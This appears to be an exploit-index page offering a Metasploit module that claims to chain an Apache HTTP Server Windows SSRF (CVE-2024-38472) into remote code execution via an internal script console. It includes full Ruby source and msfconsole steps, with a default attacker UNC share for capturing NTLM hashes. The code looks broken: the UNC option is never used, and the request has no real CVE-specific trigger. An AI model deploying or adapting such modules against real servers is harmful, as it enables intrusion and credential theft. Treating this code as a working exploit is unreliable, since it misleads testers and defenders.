## https://sploitus.com/exploit?id=CDC791CD-A414-5ABE-A897-7CFA3C2D3D29
Creating a Remote Code Execution (RCE) Metasploit module for the SSRF vulnerability (CVE-2024-38472) in Apache HTTP Server on Windows is challenging because SSRF itself doesn't directly result in RCE. However, SSRF can often be a step toward achieving RCE, especially if you can use it to interact with internal services or trigger a secondary vulnerability.
### Strategy for RCE via SSRF
To achieve RCE through SSRF, we would generally need:
1. An internal service vulnerable to a specific attack that can be exploited via SSRF.
2. A misconfiguration or additional vulnerability that allows for arbitrary code execution.
For this example, let's assume that we can trigger a secondary service internally that accepts HTTP requests and can be tricked into executing arbitrary code (like a Jenkins server or another service with an exposed API).
### Example Metasploit Module
We'll craft a Metasploit module that attempts to achieve RCE by exploiting the SSRF to interact with an internal service. In this case, we'll simulate an internal Jenkins server with an exposed script console that we can abuse for RCE.
Save the following code as `apache_unc_ssrf_rce.rb` in the `modules/exploits/multi/http` directory of your Metasploit Framework installation.
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache HTTP Server Windows UNC SSRF to RCE',
'Description' => %q{
This module exploits a Server-Side Request Forgery (SSRF) vulnerability in Apache HTTP Server on Windows,
which can potentially be leveraged to achieve Remote Code Execution (RCE) by interacting with internal
services like Jenkins.
},
'Author' =>
[
'Your Name' # Your name or handle
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2024-38472'],
['URL', 'https://example.com/advisory'] # Replace with an advisory link if available
],
'DisclosureDate' => 'Aug 03 2024',
'Platform' => ['win'],
'Arch' => [ARCH_CMD],
'Targets' => [
['Windows', { 'Arch' => ARCH_CMD, 'Platform' => 'win' }]
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RHOSTS,
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, "The base path to the vulnerable application", '/']),
OptString.new('UNC_SERVER', [ true, "UNC path of the malicious server to receive NTLM hashes", '\\\\attacker-server\\share']),
OptString.new('INTERNAL_SERVICE', [ true, "Internal service URL to exploit for RCE", 'http://internal-service/script']),
OptString.new('CMD', [ true, "Command to execute", 'calc.exe'])
])
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
})
if res && res.headers['Server'] && res.headers['Server'].include?('Apache')
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
ssrf_payload = {
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'version' => '1.1',
'headers' => {
'Host' => datastore['RHOSTS'],
'Content-Type' => 'application/x-www-form-urlencoded'
},
'data' => "url=#{datastore['INTERNAL_SERVICE']}?script=#{Rex::Text.uri_encode(datastore['CMD'])}"
}
begin
print_status("Sending SSRF request to #{datastore['RHOSTS']}:#{datastore['RPORT']}#{target_uri.path}")
res = send_request_cgi(ssrf_payload)
if res && res.code == 200
print_good("Successfully triggered the internal service")
else
print_error("Failed to trigger the internal service: #{res.inspect}")
end
rescue ::Rex::ConnectionError => e
print_error("Connection failed: #{e.message}")
rescue ::Interrupt
print_status("User interrupted the module execution")
rescue ::Exception => e
print_error("An unexpected error occurred: #{e.message}")
end
end
end
```
### Usage Instructions
1. **Save the Module**:
Save the module as `apache_unc_ssrf_rce.rb` in the `modules/exploits/multi/http` directory of your Metasploit Framework installation.
```bash
/path/to/metasploit-framework/modules/exploits/multi/http/apache_unc_ssrf_rce.rb
```
2. **Load Metasploit**:
Start Metasploit Framework by opening a terminal and running:
```bash
msfconsole
```
3. **Use the New Module**:
In the Metasploit console, load the new exploit module using the following command:
```bash
use exploit/multi/http/apache_unc_ssrf_rce
```
4. **Configure and Run**:
Set the necessary options, such as `RHOSTS`, `RPORT`, `TARGETURI`, `UNC_SERVER`, `INTERNAL_SERVICE`, and `CMD`. Then run the module.
```bash
msf6 > use exploit/multi/http/apache_unc_ssrf_rce
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set RHOSTS target_ip
RHOSTS => target_ip
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set RPORT 80
RPORT => 80
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set TARGETURI /
TARGETURI => /
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set UNC_SERVER \\\\attacker-server\\share
UNC_SERVER => \\attacker-server\share
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set INTERNAL_SERVICE http://internal-service/script
INTERNAL_SERVICE => http://internal-service/script
msf6 exploit(multi/http/apache_unc_ssrf_rce) > set CMD calc.exe
CMD => calc.exe
msf6 exploit(multi/http/apache_unc_ssrf_rce) > run
```
### Important Considerations
- Ensure you have the appropriate permissions before testing or exploiting any systems.
- This module is designed for educational and testing purposes. Always test in a safe and controlled environment before using it on any production systems.
This enhanced Metasploit module sends a crafted request to the vulnerable Apache HTTP server on Windows, attempting to trigger the SSRF vulnerability and leverage it to achieve RCE by interacting with an internal service. Adjust the payload and module as necessary based on the specific nature of the vulnerability and the target environment.